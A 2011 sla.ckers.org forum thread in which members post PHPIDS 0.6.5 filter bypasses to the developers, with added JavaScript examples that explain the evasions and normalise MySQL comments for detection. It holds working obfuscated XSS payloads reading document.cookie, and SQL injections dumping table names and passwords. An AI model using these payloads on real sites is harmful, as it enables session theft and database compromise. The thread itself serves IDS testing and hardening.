Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 
Re: PHPIDS 0.6.5
Posted by: thornmaker
Date: June 28, 2011 02:16AM

nice work hafif :)

Re: PHPIDS 0.6.5
Posted by: hafif
Date: June 28, 2011 10:56PM

thornmaker Wrote:
-------------------------------------------------------
> nice work hafif :)


Thanks :)

Here is one for Chrome and FF, using a popup.
http://demo.phpids.org/?test=showModalDialog%28%28/javascript/%28{a:/javascript/,b:1}.a%29%29%2b%28/:aler/%28{a:/:aler/,b:1}.a%29%29%2b%28/t.1.%2b1/%28{a:/t%281%29%2b1/,b:1}.a%29%29%29;

Or you can just showModalDialog("http://evil.com"), but then you will lose the domain context (and you want it).

If the popup blocker is on, it will block the script; if not, the script will run.
Otherwise, clicking on the links and launching the "onclick" events will cause script execution.

I am sure I can get it simplified... but I am too tired (it's 4 AM).



Edited 6 time(s). Last edit at 06/29/2011 06:03AM by hafif.

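The showModalDialog payload above, taken apart as an added example (this is not code from the thread or from PHPIDS). In the 2011 Firefox and Chrome engines a regex literal was callable, so `/javascript/(x)` behaved like `/javascript/.exec(x)`; the example spells that out with exec() so it runs on current engines, then shows why a signature that looks for the assembled string as literal text never sees it in the raw parameter. RAW_PAYLOAD is the thread's `test` parameter, URL-decoded; NAIVE_SIGNATURE is an assumed, naive rule, not a PHPIDS one.

```javascript
// Added example, not from the thread or PHPIDS: what hafif's showModalDialog
// payload evaluates to, and why a literal-text signature does not see it.

// The `test` parameter from the thread's URL, URL-decoded (constructed here).
const RAW_PAYLOAD =
  'showModalDialog((/javascript/({a:/javascript/,b:1}.a))' +
  '+(/:aler/({a:/:aler/,b:1}.a))' +
  '+(/t.1.+1/({a:/t(1)+1/,b:1}.a)));';

// Each call in the payload: a regex literal used as a function, applied to the
// `.a` property of an object literal, which is itself a regex literal.
const CALLS = [
  { pattern: /javascript/, arg: { a: /javascript/, b: 1 } },
  { pattern: /:aler/,      arg: { a: /:aler/,      b: 1 } },
  { pattern: /t.1.+1/,     arg: { a: /t(1)+1/,     b: 1 } }, // `%2b` in the URL is `+`
];

// Legacy engines treated `re(x)` as `re.exec(x)`. exec() coerces a RegExp
// argument to its string form ("/javascript/") before matching, so each
// pattern finds its text inside the argument regex's string form.
function legacyRegexCall(re, x) {
  return re.exec(x);
}

// `(m1)+(m2)+(m3)` on match arrays: each array stringifies to the matched
// text and `+` concatenates, yielding the URL the dialog actually loads.
function assemblePayload() {
  return CALLS.map(c => String(legacyRegexCall(c.pattern, c.arg.a))).join('');
}

// Assumed naive signature (not a PHPIDS rule): looks for the assembled
// string's distinctive tokens as literal text.
const NAIVE_SIGNATURE = /javascript\s*:|alert\s*\(/i;

// What each inspection stage sees. The raw parameter contains neither
// "javascript:" nor "alert(", so literal matching misses it; only a detector
// that reasons about string assembly (or the runtime itself) sees the
// javascript: URL. As the post notes, a javascript: URL keeps the page's
// domain context, which an external URL would not.
function inspect() {
  const assembled = assemblePayload();
  return {
    assembled,
    rawFlagged: NAIVE_SIGNATURE.test(RAW_PAYLOAD),
    assembledFlagged: NAIVE_SIGNATURE.test(assembled),
  };
}
```

Run `inspect()` to see the three values side by side; the point of the exercise is that the same signature fails on the wire form and succeeds on the evaluated form, which is why PHPIDS normalises and partially evaluates input before its rules run rather than matching the raw parameter.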
Re: PHPIDS 0.6.5
Posted by: lightos
Date: June 29, 2011 01:20PM

A few bypasses in this bad boy

str'=version()
UNION#
#
#
#
SELECT group_concat(table_name)#
##
/*!FROM*/ information_schema.tables WHERE '1

Re: PHPIDS 0.6.5
Posted by: Anonymous User
Date: July 06, 2011 09:48AM

Phew - all fixed. Sorry for the delay and thanks! The showModalDialog bypass was pretty... ironic :D

Re: PHPIDS 0.6.5
Posted by: hafif
Date: July 06, 2011 04:26PM

:D Indeed.

The next one is an upgrade of an older bypass. I added some evasions just to prove that we have no limitation. I had a hard time generating the letter t; finally I did it:

Works on IE.
http://demo.phpids.org/?test=%0d%2ba%0d>>showHelp(a(0).a%2ba(0).nodeName%2ba(0).b%2ba(0).c%2ba(0).nodeName.toLowerCase()%2ba(0).d%2ba(0).e);%0d'1';"1"="1";a="1\"\n<t id=a a=javascrip b=:confi c=rm(documen d=.coo e=kie) >1<<1\'1'1\"1";

// Notice we lose domain context... but still it has some nice stuff.



Edited 1 time(s). Last edit at 07/06/2011 04:35PM by hafif.

Re: PHPIDS 0.6.5
Posted by: Anonymous User
Date: August 02, 2011 11:32AM

@hafif Haha - nice, showHelp() - so some people do read the MSDN :D Sorry for the very late reply. Just deployed a fix! Thanks!

Re: PHPIDS 0.6.5
Posted by: hafif
Date: August 21, 2011 07:52PM

.mario Wrote:
-------------------------------------------------------
> @hafif Haha - nice, showHelp() - so some people do
> read the MSDN :D Sorry for the very late reply.
> Just deployed a fix! Thanks!


:) Well I didn't. But now I did, so you might want to add showModelessDialog since it might enable information and cookie theft.
http://demo.phpids.org/?test=%0d%2ba%0d>>showModelessDialog(a(0).a%2ba(0).nodeName%2ba(0).b%2ba(0).c%2ba(0).nodeName.toLowerCase()%2ba(0).d%2ba(0).e);%0d'1';"1"="1";a="1\"\n<t%20id=a%20a=javascrip%20b=:confi%20c=rm(documen%20d=.coo%20e=kie)%20>1<<1\'1'1\"1";

Re: PHPIDS 0.6.5
Posted by: Albino
Date: August 23, 2011 06:49AM

I was going to check the phpids site to see if you mind other people using it and what for but the site (php-ids.org/) is down :(

Also, you almost definitely thought of this ages ago, but using a client-side filter and checking server-side to see if it's been bypassed provides a way of detecting malicious users that probably has few false positives.

Re: PHPIDS 0.6.5
Posted by: Reiners
Date: August 23, 2011 07:20AM

@Albino: the new url is https://phpids.org/

Re: PHPIDS 0.6.5
Posted by: DebugZer0
Date: December 13, 2011 06:46AM

Any download URL?

Re: PHPIDS 0.6.5
Posted by: Reiners
Date: January 18, 2012 02:18PM

MySQL 5:
'||(true)#1'
'||true#'

'=true
UNION#
#
#
#original_by_lightos
SELECT \N,group_concat(password)#
##
/*!FROM*/ users WHERE '1

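Both comment-split payloads in this thread, lightos's information_schema one earlier and Reiners' users one just above, dodge a signature that expects the keywords to sit next to each other: `#` comments run to the end of each line, and `/*!FROM*/` hides FROM in a version comment whose body MySQL still executes. The added example below (not PHPIDS code and not from either poster) normalises MySQL comments the way the server's parser sees them and then runs a naive UNION SELECT ... FROM signature over the raw and the normalised text. The two payload constants are the thread's values with real newlines; the signature is an assumed one, not a PHPIDS rule.

```javascript
// Added example, not PHPIDS code: MySQL comment normalisation before signature
// matching, run over the two comment-split payloads posted in this thread.

// The payloads as the decoded parameter value (newlines are real).
const LIGHTOS =
  "str'=version()\nUNION#\n#\n#\n#\n" +
  "SELECT group_concat(table_name)#\n##\n" +
  "/*!FROM*/ information_schema.tables WHERE '1";
const REINERS =
  "'=true\nUNION#\n#\n#\n#original_by_lightos\n" +
  "SELECT \\N,group_concat(password)#\n##\n" +
  "/*!FROM*/ users WHERE '1";

// Assumed naive signature (not a PHPIDS rule): UNION, SELECT and FROM separated
// by nothing but whitespace, which is exactly what the comments break up.
const NAIVE_SIGNATURE = /union\s+select[\s\S]*?\s+from\s+/i;

// Rewrite the text the way MySQL's parser consumes it:
//  - `#...` and `-- ...` run to end of line and count as whitespace
//  - `/* ... */` is whitespace, except `/*! ... */`, whose body (after an
//    optional 5-digit version number, e.g. /*!50000 FROM */) is executed
//  - collapse the resulting whitespace runs
// Caveat: string literals are not tracked, so a `#` inside quotes is also
// treated as a comment; good enough for detection, not for parsing.
function normaliseMysql(sql) {
  let out = '';
  for (let i = 0; i < sql.length; ) {
    if (sql[i] === '#' || sql.startsWith('-- ', i)) {
      const nl = sql.indexOf('\n', i);
      out += ' ';
      i = nl === -1 ? sql.length : nl + 1;
    } else if (sql.startsWith('/*!', i)) {
      const end = sql.indexOf('*/', i + 3);
      let body = sql.slice(i + 3, end === -1 ? sql.length : end);
      body = body.replace(/^\d{5}/, '');
      out += ' ' + body + ' ';
      i = end === -1 ? sql.length : end + 2;
    } else if (sql.startsWith('/*', i)) {
      const end = sql.indexOf('*/', i + 2);
      out += ' ';
      i = end === -1 ? sql.length : end + 2;
    } else {
      out += sql[i];
      i++;
    }
  }
  return out.replace(/\s+/g, ' ').trim();
}

// Match the signature against what the database would execute, not against
// the bytes on the wire.
function isSuspicious(sql) {
  return NAIVE_SIGNATURE.test(normaliseMysql(sql));
}

// Side-by-side view for one payload: what the naive rule sees before and
// after normalisation.
function compare(sql) {
  return {
    normalised: normaliseMysql(sql),
    rawFlagged: NAIVE_SIGNATURE.test(sql),
    normalisedFlagged: isSuspicious(sql),
  };
}
```

`compare(LIGHTOS)` and `compare(REINERS)` both come back with rawFlagged false and normalisedFlagged true; the normalised strings read as the plain `UNION SELECT ... FROM ...` statements the comments were hiding. A filter that only ever sees the raw form has to enumerate every comment trick individually, which is the game the thread is playing against PHPIDS.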